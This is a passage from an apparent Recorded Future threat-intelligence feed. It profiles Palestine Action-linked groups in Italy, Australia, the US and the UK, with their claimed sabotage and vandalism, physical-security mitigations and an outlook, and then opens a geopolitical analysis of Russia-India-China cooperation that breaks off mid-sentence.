          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_122ef6d2b5fa1ff9c7d344d1035840e3cfe5798d2.png?width=750&amp;format=png&amp;optimize=medium" width="606" height="115" />
        </p>
        <p><em><strong>Figure 7:</strong></em> <em>Palestine Action Italia logo (Source: Palestine Action Italia)</em></p>
        <p>Palestine Action Italia, more commonly known as Palestina Libera, is Palestine Action’s Italy-based franchise. On its website, the group directly identifies itself as “the Italian branch of the international ‘Palestine Action’ campaign, which in England directly led to the closure of three arms factories involved in the genocide in Gaza.” The group also uses similar branding as the UK branch, employs similar TTPs, and targets the same sectors, focusing largely on defense contractors with facilities in Italy. In particular, Palestina Libera’s direct actions have frequently targeted the Italy-based defense contractor Leonardo at its offices throughout the country, due to its joint ventures with Elbit.</p>
        <p>The organization very likely emerged from pro-Palestinian activist factions in Italy that increasingly aligned with Palestine Action’s global network in the wake of the October 7, 2023, attack. While data in the Recorded Future Platform indicates that the current registration of the group’s website domain dates to February 4, 2024, a 2008 <a href="https://badil.org/phocadownload/Badil_docs/publications/al-majdal-38.pdf">issue</a> of al-Majdal Magazine — the quarterly publication of the BADIL Resource Center for Palestinian Residency &amp; Refugee Rights — indicates that the same domain was operated by an Italian pro-Palestinian organization, the Comitato di Solidarietà con il Popolo Palestinese, Torino [Committee for Solidarity with the Palestinian People in Turin, Italy]. Screenshots of the domain captured in the Wayback Machine indicate that between October 2010 and the website’s February 2024 registration, the site displayed a default hosting-provider message telling the administrator to “upload [their] website into the public_html directory.” This message almost certainly indicates that the domain remained pointed at a hosting account during the interim, but that no content had been uploaded to it. The group’s active social media accounts were created in November and December 2023.</p>
        <p>Following Palestine Action’s July 5, 2025, designation as a terrorist organization in the UK, Palestine Action Italia has likely become one of the organization’s most prioritized franchises. Palestine Action’s main website currently includes a link to donate to Palestina Libera, hosted on Palestina Libera’s website. This donation section uses the service provider Donorbox to facilitate transactions, with options for donors including sending €15 for “a little bit of paint,” €50 for “smoke bombs in action,” €100 for the “legal expenses fund,” or another amount determined by the donor. Palestina Libera has also very likely increased its operational tempo in the wake of the proscription, citing Palestine Action UK’s designation and the arrests of protesters at rallies in the UK as motivation for new direct actions. For instance:</p>
        <ul>
          <li>On October 3, 2025, Palestina Libera took part in pro-Palestine direct actions across Italy, protesting the Israeli government’s interception of the Global Sumud Flotilla. Activists very likely affiliated with Palestina Libera participated in occupations and blockades of major transportation and logistics infrastructure, including <a href="https://www.instagram.com/reel/DPWT8gQjYO9/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">obstructing</a> a runway at Pisa International Airport, <a href="https://www.instagram.com/reel/DPWqPwHDX89/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">occupying</a> several highways in the Tuscany region, and blockading an Amazon Logistics facility in Brandizzo.</li>
          <li>On September 29, 2025, the group <a href="https://www.instagram.com/reel/DPMU7CiDLju/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">claimed</a> to have blockaded a Leonardo facility in the town of Nerviano. In a social media post, it alleged that at least one Leonardo employee working at the facility joined its protest.</li>
          <li>On September 25, 2025, several of the group’s activists <a href="https://www.instagram.com/reel/DPBW13SjC3F/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">chained</a> themselves together outside a Rheinmetall facility in Rome, which they claimed “hindered production” and “made the gate inaccessible for an entire work shift.”</li>
        </ul>
        <h3>Affiliate: Death to Toll (Australia)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_150556c905aaf15c815e6d439844ade4f10514771.png?width=750&amp;format=png&amp;optimize=medium" width="661" height="416" />
        </p>
        <p><em><strong>Figure 8:</strong></em> <em>Death to Toll logo (Source:</em> <em><a href="https://www.instagram.com/p/DMJ89bkP9FP/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">Instagram</a>)</em></p>
        <p>“Death to Toll” is a campaign by anarchist violent extremists (AVEs) in Australia to conduct vandalism, obstruction, and sabotage against the Australian international logistics and shipping company Toll Group (Toll), its parent organization Japan Post Holdings, and defense contractors working with the Australian Defence Force (ADF), due to accusations that Toll and the ADF are partnering with the Israeli military. The group responsible for this campaign is classified as a Palestine Action affiliate, as it almost certainly shares Palestine Action UK’s ideology and uses TTPs promoted by the group, but operates solely in the Melbourne, Australia, area and has chosen its own companies to target.</p>
        <p>The first attack claimed by this group was a <a href="https://www.instagram.com/reel/DCQQoNwNirH/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">sabotage</a> of a Heat Treatment Australia (HTA) facility on October 14, 2024; the campaign against Toll began with an <a href="https://www.instagram.com/p/DDne15_tEvP/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">obstruction</a> of one of the company’s facilities in Melbourne on November 22, 2024. In an August 7, 2025, interview, Death to Toll’s organizers <a href="https://www.sydneycriminallawyers.com.au/blog/everything-is-on-the-table-says-direct-action-group-targeting-toll-holdings-for-driving-genocide/">cited</a> Palestine Action’s targeting of UK shipping organizations that partnered with Elbit as an inspiration for their attacks. They have also shared a copy of Palestine Action’s 2023 instructional guide on their website.</p>
        <p>In recent months, the Death to Toll group has claimed responsibility for several acts of vandalism, obstruction, and sabotage targeting Toll:</p>
        <ul>
          <li>On October 7, 2025, AVEs claimed responsibility for intercepting a Toll fuel truck in Melbourne by obstructing a road with flaming objects. They subsequently spray-painted the truck with red graffiti.</li>
          <li>On August 31, 2025, AVEs <a href="https://www.instagram.com/reel/DO0o6wTD565/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">claimed</a> to have attacked a Toll facility in Dandenong South. A video posted to the group’s Instagram account shows activists smashing exterior glass doors of the facility with a blunt object and dousing them with a flammable liquid in a bottle, very likely gasoline.</li>
          <li>On August 11, 2025, AVEs <a href="https://www.instagram.com/reel/DNPf4cuoxkd/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">claimed</a> to have vandalized a Toll facility in Truganina, writing graffiti, spraying red paint, and damaging keycard access devices on the exterior of the facility. Toll <a href="https://www.jpost.com/diaspora/antisemitism/article-864565">confirmed</a> the attack in a statement to the press, and Victoria Police indicated they were investigating the incident.</li>
        </ul>
        <p>Beyond its website, the Death to Toll campaign operates a social media account and accepts submissions from independent AVEs for claims of responsibility and tips on potentially vulnerable facilities on a Mega file-sharing site and through a Proton Mail email address. The social media pages attributed to the group have frequently used the hashtags #socalledaustralia, #DeathToll, and #TheDeathTollisRising. On the front page of their website, the administrators have posted a call to action against industries in Australia that they perceive to be providing support for the IDF. Specifically, they claim that “all sites and equipment used or owned by Toll Holdings and its parent company, Japan Post, are legitimate targets for anti-genocide action. This includes sabotage, vandalism, blockades, strikes, occupations, and all forms of resistance and disruption. Everything is on the table.”</p>
        <h3>Offshoot: Unity of Fields (United States)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_18ea20b3f7868e11207e286ab17d6b023d7c636f6.png?width=750&amp;format=png&amp;optimize=medium" width="400" height="400" />
        </p>
        <p><em><strong>Figure 9:</strong></em> <em>Unity of Fields logo (Source:</em> <em><a href="https://x.com/unityoffields">Social Media</a>)</em></p>
        <p>Unity of Fields (UoF) describes itself as an “anti-imperialist propaganda front” that reports on the activities of militant pro-Palestinian activists in the US. In this regard, it functions in a similar fashion to AVE “counter-info” outlets, which provide AVEs in a specified geographic area with information pertaining to upcoming protests and demonstrations, claims of responsibility for AVE attacks, guides and instructional material for carrying out attacks, and communiqués from local AVE groups.</p>
        <p>UoF was almost certainly founded as a Palestine Action franchise in the US: during its initial years of operation, it used the name “Palestine Action US,” was managed by a cell of activists who almost certainly founded the group with <a href="https://therealnews.com/meet-the-activists-fighting-zionism-with-direct-action">insight</a> from Palestine Action UK members, and devoted itself to attacking Elbit facilities in the US using Palestine Action’s standard TTPs.</p>
        <p>From October 7, 2023, to August 2024, Palestine Action US predominantly conducted vandalism, obstruction, and sabotage against Elbit facilities, particularly in Cambridge, Massachusetts, and Merrimack, New Hampshire. Calla Walsh — almost certainly one of Palestine Action US and UoF’s de facto <a href="https://therealnews.com/meet-the-activists-fighting-zionism-with-direct-action">leaders</a> between October 2023 and July 2025 — was arrested and convicted for her role in a November 20, 2023, Palestine Action US <a href="https://www.wmur.com/article/merrimack-new-hampshire-elbit-systems-sentences/62908047">attack</a> on an Elbit facility in Merrimack.</p>
        <p>In August 2024, following Walsh’s release from prison, Palestine Action US announced its rebranding as “Unity of Fields”, appropriating a concept from the Yemeni Houthi movement. The group subsequently renamed its social media and online messenger accounts, launched a new website dedicated to the group’s communiqués and instructional materials, and claimed the group’s new mission was to establish “a militant propaganda front against the US-NATO-zionist axis of imperialism.” In addition to claims of responsibility for attacks, the website also hosts a repository of instructional and ideological material, as well as publications produced by other AVE groups.</p>
        <p>Autonomous pro-Palestinian activists across the US have sent UoF several dozen claims of responsibility for publication, covering operations against an array of targets, including defense contractors (including Magellan Aerospace, Rolls-Royce and MTU America, Lockheed Martin, Ghost Robotics Corporation, Leidos, and Israel Chemicals), banks (including Bank of America, Citibank, Wells Fargo, Chase Bank, and BNY Mellon), shipping and logistics companies (including Maersk and Amazon), US military recruitment centers, law enforcement infrastructure (particularly vehicles), university buildings and officials, public transportation, and construction buildings and equipment. Occasionally, DVEs from outside of the US — including other Palestine Action global network groups — send communiqués to UoF for publication. At the time of writing, the most recent claims of responsibility include:</p>
        <ul>
          <li>An August 7, 2025, communiqué claiming responsibility for an arson of several vehicles at a Lovitt Technologies plant in Melbourne, Australia</li>
          <li>A May 29, 2025, communiqué claiming responsibility for spray-painting several pro-Palestinian messages on a Maersk shipping container in Oakland, California</li>
          <li>A May 9, 2025, communiqué from protesters at the University of Washington that details the occupation of a university building</li>
        </ul>
        <p>UoF has significantly decreased its output of new claims of responsibility since late July 2025, very likely because of internal disputes and a leadership transition within the group. On July 29, 2025, Calla Walsh <a href="https://x.com/callawalsh/status/1950366979233054839">reported</a> on social media that she was “no longer part of” UoF after a dispute over the “direction in which the project is going,” following which Walsh reported “the organization purged me” and that she had “complied with the decision and transferred them ownership of the accounts.” While Insikt Group is unaware of the exact nature of this dispute, Walsh’s departure from UoF directly followed a July 2025 trip she made to Iran, where she <a href="https://x.com/Sobh_festival/status/1945795728795717751">participated</a> in an event hosted by the World Service of the Islamic Republic of Iran Broadcasting (IRIB), Iran’s government-operated media agency. In an October 5, 2025, article on her Substack page, Walsh reported that she had been detained by US Customs and Border Protection (CBP) officers at New York’s John F. Kennedy International Airport following her return from Tehran.</p>
        <h3>Partner: Shut the System (United Kingdom)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a8b8e989596e70bc2cae00253a826090b8f15030.png?width=750&amp;format=png&amp;optimize=medium" width="400" height="400" />
        </p>
        <p><em><strong>Figure 10:</strong></em> <em>Shut the System logo (Source:</em> <em><a href="https://x.com/shut_system/photo">Social Media</a>)</em></p>
        <p>Unlike other groups included in this report, which are predominantly motivated by the Palestinian cause, Shut the System is a UK-based environmental violent extremist (EVE) group that likely <a href="https://x.com/money_rebellion">emerged</a> as an offshoot of the UK climate activist group Extinction Rebellion (XR). However, the group has also almost certainly conducted pro-Palestinian direct actions. In addition, Shut the System has directly collaborated with Palestine Action in the UK, almost certainly due to substantial overlaps between Palestine Action’s and Shut the System’s TTPs, preferred targets, and areas of operation. For instance, Shut the System frequently targets insurers and banks that it claims provide services to major global fossil fuel extraction projects; Palestine Action has also targeted many of the same companies on the grounds that they provide services to the IDF or Israeli government. Both groups also frequently use vandalism with red paint, projectiles, or blunt objects to deface the facade of target properties, as well as sabotage, although Shut the System has very likely deployed more sophisticated methods of infrastructure sabotage than Palestine Action. Overall, Shut the System fits the profile of a Palestine Action partner organization.</p>
        <p>The first reported Shut the System operation <a href="https://realmedia.press/fossil-fuel-insurance-sabotage">took place</a> in late February 2024. During 2024, the group predominantly conducted vandalism targeting the London offices of insurance companies, such as AIG, Probitas 1492, Chubb, Liberty General, Lloyd’s of London, Markel UK, QBE, Tokio Marine, as well as Barclays, using red paint, graffiti, and projectiles. In a January 2025 <a href="https://realmedia.press/fossil-fuel-insurance-sabotage/">communiqué</a>, Shut the System claims to have selected these companies as targets because they were identified in a November 2023 <a href="https://www.insurancebusinessmag.com/us/news/environmental/revealed--top-fossil-fuel-insurers-465650.aspx">article</a> from Insurance Business Magazine as among the top ten insurers of fossil fuel extraction projects in the world. On June 10, 2024, Shut the System and Palestine Action <a href="https://www.bbc.com/news/articles/c1rrzp1qwp1o">conducted</a> a joint, UK-wide operation targeting Barclays bank branches in Birmingham, Bristol, Brighton, Edinburgh, Exeter, Glasgow, Lancashire, London, Manchester, Northampton, Sheffield, and Solihull. Activists from both groups sprayed red paint on the exterior of the branch facilities and smashed their windows with projectiles.</p>
        <p>Subsequently, the group has very likely expanded its targeting aperture to include conservative think tanks, additional financial services providers, and events for defense contractors, posting claims of responsibility for attacks on its websites and social media profiles. Shut the System’s website also contains instructions on how to conduct vandalism, obstruction, and sabotage on behalf of the group, and provides a list of 38 banks and insurance companies that it identifies as priority targets due to their alleged financing of the fossil fuel industry. The group continues to conduct joint operations with a number of UK-based AVE and EVE cells, including cells affiliated with groups that are almost certainly Palestine Action offshoots. For instance, during the past several months, Shut the System claims to have collaborated with pro-Palestinian militant direct action groups during the following operations:</p>
        <ul>
          <li>On October 8, 2025, Shut the System’s “Palestine solidarity faction” and activists from the UK group Palestine Pulse claimed to have used projectiles and blunt instruments to destroy “entrances, glass panels, security cameras and ID card readers” at a Palantir Technologies facility in London. They additionally claimed to have sprayed red paint on the building’s facade.</li>
          <li>On September 29, 2025, Shut the System claimed to have conducted a joint operation with Shut Elbit Down and French and German XR affiliate groups to target Barclays and BlackRock assets throughout the UK and Europe. Activists sprayed red paint outside of Barclays offices in Paris, France, and Hamburg, Germany, and a BlackRock office in Vienna, Austria, and “superglued locks of [Barclays] branches across the UK.” Additionally, Shut the System stated it targeted two Barclays senior executives in the UK by spraying red paint outside of their personal residences, and sending letters to the executives’ neighbors “inviting them to a cocktail party hosted by the [executive] where they can explain why they have no conscience.”</li>
          <li>On September 8, 2025, Shut the System claimed to have severed fiber-optic cables leading to the London offices of Clarion Events, the company <a href="https://www.find-tender.service.gov.uk/Notice/029807-2025?origin=SearchResults&amp;p=2">responsible</a> for hosting the Defence and Security Equipment International (DSEI) defense trade exhibition. It conducted the action as part of a campaign, “Shut DSEI Down,” that aimed to protest the trade exhibition due to the participation of several defense contractors that pro-Palestinian activists argue provide armaments to the IDF.</li>
        </ul>
        <p>From January 2025 onward, Shut the System frequently used a physical attack TTP that we have not observed in the operations of other Palestine Action global network groups, namely, sabotaging communications infrastructure by cutting fiber-optic lines. Instructions on Shut the System’s website demonstrate how to identify fiber-optic cable boxes outside of target facilities, locate the correct wires, and sever them to disrupt internet and other communications services to the building. Between August 18 and September 31, 2025, Shut the System launched a campaign titled “Summer of Sabotage” in which it encouraged activists to use these and other sabotage TTPs to target banks and financial industry entities.</p>
        <h2>Mitigations</h2>
        <p>The decentralized nature of individual Palestine Action cells means that activists very likely plan operations in closed or encrypted communications channels that are almost certainly inaccessible to individuals who have not established their bona fides with the group. The groups’ official communications announce operations after the fact; they almost certainly will not provide indicators and warnings (I&amp;W) of planned activities.</p>
        <p>To diminish risks from physical threat activities conducted by Palestine Action’s global network, organizations and their physical security teams should focus on mitigating the effects of attacks by implementing the following approaches. Overall, physical security measures should aim to deny Palestine Action operatives interior access to facilities. The most costly attacks perpetrated by the group — including the June 2025 attack on RAF Brize Norton — took place after activists were able to breach secure perimeters, enter facilities, and sabotage assets stored inside perimeters.</p>
        <ul>
          <li>Recorded Future customers can leverage the Recorded Future Intelligence Operations Platform to monitor communications sources connected to Palestine Action and its global network, in order to identify changes in targeting trends and TTPs and to assess an organization’s overall risk level.</li>
          <li>Customers can use the Recorded Future Platform’s Intelligence Cards, Advanced Query Builder, and Insikt Group reporting to track ongoing global events — such as the Israel-Hamas conflict or the status of Palestine Action’s legal battle against its terrorism designation in the UK — that are likely to affect threat actors’ operational tempo and targeting aperture.</li>
          <li>Integrate this report and other Insikt Group assessments of DVE threat actors’ TTPs and targeting into structured tabletop exercises for physical security teams.</li>
          <li>Review and, where necessary, implement governmental <a href="https://www.osce.org/secretariat/597756">guidelines</a> for physical protection of business facilities, particularly with regard to electronic surveillance, secure lighting, and security personnel.</li>
          <li>Conduct vulnerability assessments to enable effective contingency and resiliency planning in the event of an incident of vandalism, obstruction, or sabotage, with particular focus on a successful incident disrupting communications, transportation, and energy infrastructure.</li>
          <li>Limit voluntary publication of information about the functions, layout, and location of critical infrastructure assets at facilities, or security measures at a facility, beyond the levels necessary to comply with legal or regulatory requirements.</li>
        </ul>
        <h2>Outlook</h2>
        <p>While Palestine Action’s branch in the UK continues the ongoing legal appeal of its terrorism designation — very likely until the designation is rescinded or all of its legal options are exhausted — Palestine Action’s global network is very likely to escalate the frequency and scope of its militant direct action operations. In the short to medium term, the formation of new Palestine Action global network groups in North America, Western Europe, Australia, and elsewhere around the world is likely, threatening an increased range of organizations in defense contracting, banking, finance, insurance, and shipping and logistics sectors.</p>
        <p>Extant groups linked to Palestine Action are also likely to traverse the various categories of groups described in this report, with cells inside the UK attempting to separate themselves from the Palestine Action brand to avoid legal scrutiny and cells outside the UK highlighting their connections to Palestine Action to build credibility with AVEs and the pro-Palestine activist movement. As such, we expect existing franchises and affiliates in the UK to increasingly become offshoots and partners while the ban is in effect; the reverse is likely in geographic areas outside the UK where Palestine Action is not a designated terrorist organization.</p>
        <p>Volatile dynamics in the Israel-Hamas conflict and the situation in the Gaza Strip are also very likely to influence Palestine Action’s global network in the short to medium term, especially with regard to the frequency of attacks. At the time of writing, a ceasefire between Israel and Hamas, effective October 10, 2025, remains in effect. While the establishment of the ceasefire likely did not stop Palestine Action network groups from conducting operations — several of the groups profiled in this report have carried out attacks in the interim — any potential breakdown in the ceasefire would very likely augur increased Israeli military activity in the Gaza Strip that has historically caused upticks in attacks related to the network.</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_15526186964d3548d60e4a73cf876721d522ad671.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Implications of Russia-India-China Trilateral Cooperation]]></title>
            <link>https://www.recordedfuture.com/research/implications-of-russia-india-china-trilateral-cooperation</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/implications-of-russia-india-china-trilateral-cooperation</guid>
            <pubDate>Wed, 10 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Examines Russia-India-China trilateral cooperation, U.S. tariffs and sanctions, why a formal bloc is unlikely, and implications for governments and business.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group assesses that the August 2025 meeting of Chinese Communist Party (CCP) General Secretary Xi Jinping, Indian Prime Minister Narendra Modi, and Russian President Vladimir Putin at the Shanghai Cooperation Organization (SCO) Summit likely suggests early interest among the three states in exploring trilateral cooperation, though the formation of a resilient bloc remains unlikely.</p>
        <p>United States (US) policy –– particularly the level of sanctions the US places on each country –– is likely one of the primary factors driving the three states to change their level of cooperation. An increase in US sanctions is likely to drive each state to pursue alternative markets; this motivation has led to an acceleration of trilateral cooperation in some areas, and a reduction in others. For example, President Donald Trump’s decision to impose tariffs on India in mid-2025 very likely amplified a warming China-India relationship and reinforced a stable India-Russia relationship. In contrast, US sanctions on Russian oil companies in October 2025 led China and India to decrease their level of Russian oil imports.</p>
        <p>The second factor driving Russia, India, and China to explore trilateral cooperation is very likely their shared strategic interest in a multipolar global order — manifest through fora like SCO and BRICS (Brazil, Russia, India, China, and South Africa).</p>
        <p>However, despite nascent trilateral cooperation, there remains significant divergence among the three countries’ foreign policy goals, governing principles, and economic ambitions, which likely limits the scope of their cooperation. The political, economic, and military dynamics that shape bilateral relationships between China-Russia, China-India, and India-Russia are complex and distinct. Of those relationships, challenges between Beijing and New Delhi are almost certainly the greatest barrier to the formation of a trilateral bloc or alliance. In particular, India’s competition with China for Asia-Pacific regional leadership and influence, a large trade deficit favoring China, and unresolved border disputes will very likely temper the depth of cooperation between the two. All three countries seek to create an alternative center of gravity to the West, but India does not share Russia’s or China’s staunchly anti-Western worldview.</p>
        <p>Although BRICS and SCO almost certainly represent viable opportunities for the three countries to foster trilateral cooperation, significant limitations prevent deeper alignment within these fora. The Russia-India-China (RIC) dialogue format, if rejuvenated, would offer the most likely format to formalize trilateral alignment. Insikt Group identified a range of potential indicators that are likely to reflect a coalescence into a political, economic, or military bloc.</p>
        <p>Deepening trilateral coordination would almost certainly have broad implications for both the public and private sectors, depending on the depth and intensity of the cooperation. For example, the formation of trilateral economic frameworks, such as lower trade barriers or coordinated regulatory schemes, would force private sector companies operating in any of these countries to adapt to new regulatory standards and potentially face increased competition from an enlarged trilateral economic market. Deeper defense cooperation could lead to shifts in the defense industry of each country, as markets adjust to serve the defense needs of each member of the trilateral. If this leads Chinese and Indian defense industries to increasingly look to serve Russian defense needs, it could force companies that currently produce dual-use technologies for China and India to make adjustments to avoid transacting with sanctioned Russian defense entities.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>The single greatest impediment to trilateral cooperation is very likely the deep distrust between China and India, which underpins political, economic, and military competition — including a decades-long border dispute. India’s doctrine of strategic autonomy and its pursuit of “multi-alignment” are likely to limit its willingness to join a formal trilateral bloc with China and Russia that is explicitly positioned as a counterweight to the West.</li>
          <li>However, all three states very likely share a desire for a multipolar world that includes more developed regional centers of power. This likely helps drive trilateral cooperation to avoid US influence that threatens the strategic interests of Russia, China, and India.</li>
          <li>The nearly decade-long strategic partnership between Moscow and Beijing is likely a key factor driving trilateral cooperation, as Russia and China have shared experience developing alternative centers of power to the West. Both states are likely motivated to convince India to adopt a similar strategy.</li>
          <li>An increase in US sanctions and tariffs is very likely to be a primary factor driving greater trilateral cooperation, as all three states seek alternative markets and China and India likely aim to avoid secondary sanctions. In contrast, Western government policies that facilitate China’s and India’s access to Western markets are likely to lessen Beijing’s and New Delhi’s incentive to deepen trilateral economic cooperation.</li>
          <li>Deepened trilateral economic cooperation very likely would increase the prospect that Western companies — especially those operating in India — see heavier state involvement in the private sector and greater Western scrutiny of Indian economic transactions to catch sanctions violations, as New Delhi aligns its practices with Moscow and Beijing.</li>
        </ul>
        <h2>Background: US Policy Likely Driving Nascent Cooperation Among China, India, and Russia</h2>
        <p>We assess that there are early signs of cooperation among India, China, and Russia in recent months and that this cooperation is likely to expand, driven primarily by an emerging thaw in China-India relations. Against the backdrop of strong India-Russia and China-Russia relations, this warming of China-India relations likely increases the prospect of a deeper trilateral relationship. However, a formal China-India-Russia bloc has not yet formed, and significant limitations –– particularly around Beijing-New Delhi tensions –– are likely to challenge such an alignment.</p>
        <p>India has likely calculated that the US’s 50% tariff on Indian exports –– imposed on India in August 2025, comprising a 25% reciprocal tariff and a 25% “penalty” tariff due to India purchasing sanctioned Russian oil –– <a href="https://www.livemint.com/economy/trump-tariffs-government-exploring-alternate-export-markets-to-protect-interests-of-farmers-11757323797479.html">necessitates</a> <a href="https://www.reuters.com/business/finance/indias-small-businesses-scramble-cushion-blow-trumps-50-tariffs-2025-08-28/">looking</a> for alternative markets and <a href="https://economictimes.indiatimes.com/news/economy/foreign-trade/indian-exporters-shift-focus-to-new-markets-amid-us-tariff-hike/articleshow/123621635.cms?from=mdr">deepening</a> foreign partnerships to recoup lost revenue and reinforce relationships India likely views as more reliable, including <a href="https://www.csmonitor.com/World/Asia-South-Central/2025/0930/india-china-trade-tariffs-ports">cultivating</a> its relationship with Beijing. On August 6, 2025, one day before the US imposed a 50% tariff on Indian exports to the US, the Indian Ministry of External Affairs <a href="https://www.mea.gov.in/Speeches-Statements.htm?dtl/39945/Statement_by_Official_Spokesperson#:~:text=Media%20Center,on:%206/8/2025">called</a> the US’s decision “unfair” and “unjustified” and vowed that India would “take all actions necessary to protect its national interests.” India has specifically <a href="https://timesofindia.indiatimes.com/business/india-business/us-tariffs-over-russian-oil-unfair-eam-jaishankar-says-actively-working-on-resolving-issues/articleshow/124320954.cms">highlighted</a> the inconsistency in the US’s application of a penalty tariff on India for importing Russian oil, while other countries, “even those with more adversarial relations with Russia,” have also sourced oil from Russia. 
China’s <a href="https://www.bloomberg.com/news/articles/2025-09-02/russia-s-oil-exports-swing-to-china-after-india-suffers-us-tariff-hit">increasing</a> oil imports from Russia likely reinforced to New Delhi that the US’s tariff policy was unjust. Indian officials are reportedly <a href="https://www.business-standard.com/external-affairs-defence-security/news/india-us-trade-deal-impact-trump-tariffs-us-supreme-court-125111001525_1.html">monitoring</a> the US Supreme Court case (challenging the Trump administration’s tariffs) to determine its impact on current US-India trade negotiations. A breakthrough in trade talks would likely improve, but not entirely <a href="https://www.lowyinstitute.org/the-interpreter/will-trade-deal-repair-india-us-ties">repair</a>, the deteriorating diplomatic and economic ties between India and the US.</p>
        <p>The US tariffs have likely also <a href="https://www.crisisgroup.org/asia-pacific/south-asia/india-china/india-rekindles-its-china-ties-trumps-tariffs-bite">reinforced</a> an emergent reconciliation between India and China. In August 2025, Chinese Foreign Minister Wang Yi visited New Delhi for the first time in three years. Beijing likely sees economic and political benefit to deepening ties with India, including exploiting the Indian market for Chinese exports and curbing US influence in South Asia. China’s trade surplus with India and status as the top exporter of electronics, telecommunications, and machinery to India likely give Beijing economic leverage in negotiations with India, particularly as India looks to recoup revenue lost due to US tariffs.</p>
        <p>Following Modi’s August 31, 2025, meeting with Xi –– Modi’s first visit to China in seven years, at the SCO Summit in Tianjin –– Modi <a href="https://www.indiatoday.in/india/story/read-full-statement-on-pm-modi-bilateral-meeting-with-president-xi-at-tianjin-sco-summit-2779553-2025-08-31">stated</a> that “a stable relationship and cooperation” between China and India was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century.” Amid India’s stated frustration over US tariffs, the highly publicized friendly interaction between Modi, Xi, and Putin <strong>(Figure 1)</strong> at the SCO Summit sparked concerns over an emergent Russia-India-China troika.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_18c4f5e2ffd69ace89bc012728f00a6e81ca819c7.png?width=750&amp;format=png&amp;optimize=medium" width="486" height="441" />
        </p>
        <p><em><strong>Figure 1:</strong></em> <em>Photo posted by Modi of himself with Putin and Xi at the SCO Summit on August 31, 2025 (Source: Social Media)</em></p>
        <p>The nascent warming of China-India relations likely makes deeper trilateral cooperation among China, India, and Russia more probable, as China and Russia, as well as India and Russia, already have strong relations. Thus, a warming China-India relationship ameliorates the biggest barrier to the formation of a trilateral dynamic. In addition, all three states likely see political and economic benefits to deepening cooperation.</p>
        <h2>Areas of Bilateral Intersection and Divergence Among China, India, and Russia</h2>
        <p>Deepening trilateral cooperation among China, India, and Russia likely serves the strategic foreign policy interests of each state, though the trajectory of any fully formed trilateral dynamic is likely to be shaped by nuanced differences among each state’s foreign policy, as well as the bilateral dynamics within this group.</p>
        <h3>China’s Foreign Policy</h3>
        <p>China’s foreign policy toward Russia and India is almost certainly an outgrowth of the country’s primary strategic objectives. These include China’s “core interests,” <a href="https://archive.ph/IpxKT">such as</a> <a href="https://carnegieendowment.org/files/CLM34MS_FINAL.pdf">preserving</a> the CCP’s political power, territorial integrity, and economic development, as well as China’s <a href="https://chinaopensourceobservatory.org/glossary/advancing-towards-the-center-of-the-world-stage">efforts</a> to <a href="https://web.archive.org/web/20250219133111/https://www.fmprc.gov.cn/web/wjbzhd/202501/t20250117_11537992.shtml">shape</a> a “<a href="https://web.archive.org/web/20250310002304/https://www.mfa.gov.cn/eng/wjbzhd/202403/t20240308_11256418.html">multipolar</a>” world, which almost certainly entails independence from US coercion, an increase in China’s international influence, and greater global dependence on China. China very likely sees greater cooperation with Russia and India as supporting these goals, especially in relation to Beijing’s main <a href="https://web.archive.org/web/20230325133108/http://hochiminhcity.china-consulate.gov.cn/xwdt/202303/t20230306_11036576.html">perceived</a> <a href="https://archive.ph/5I8B8">threat</a> — the US. In particular, China almost certainly considers Russia a political, economic, and military partner that helps legitimize China’s narratives about the need for multipolarity and bolster its ability to defend itself from US coercion. China likely <a href="https://carnegieendowment.org/research/2022/12/a-historical-evaluation-of-chinas-india-policy-lessons-for-india-china-relations?lang=en">considers</a> India an important economic partner and judges that frayed India-US relations diminish the US’s efforts to encircle and contain China.</p>
        <h3>India’s Foreign Policy</h3>
        <p>India almost certainly <a href="https://rsis.edu.sg/rsis-publication/idss/ip25015-understanding-indias-evolving-policy-of-strategic-autonomy/">defines</a> its relationships with China and Russia through its <a href="https://www.mea.gov.in/press-releases.htm?dtl/40072">doctrine</a> of “strategic autonomy,” in which New Delhi avoids binding security alliances, instead maintaining flexibility in its relationships with global powers while cultivating influence across the developing world. Shaped by its role in <a href="https://theloop.ecpr.eu/indias-sovereignty-paradox-neutrality-oil-and-the-price-of-multi-alignment/">founding</a> the Non-Aligned Movement during the Cold War, New Delhi’s engagement with Beijing and Moscow has been a pragmatic <a href="https://government.economictimes.indiatimes.com/news/defence/between-empires-indias-diplomatic-balancing-act-with-the-usa-russia-and-china/121914598">balancing</a> <a href="https://www.chathamhouse.org/2025/07/back-back-brics-and-quad-meetings-highlight-indias-increasingly-difficult-balancing-act">act</a> seeking to <a href="https://eastasiaforum.org/2023/03/20/india-in-a-world-of-asymmetrical-multipolarity/">promote</a> an increasingly multipolar world order while simultaneously fostering ties with the US. India’s approach to China and Russia is also <a href="https://indiawrites.org/diplomacy/why-multi-alignment-matters-to-india-explains-jaishankar/">underpinned</a> by a “multi-alignment” policy, which very likely seeks to <a 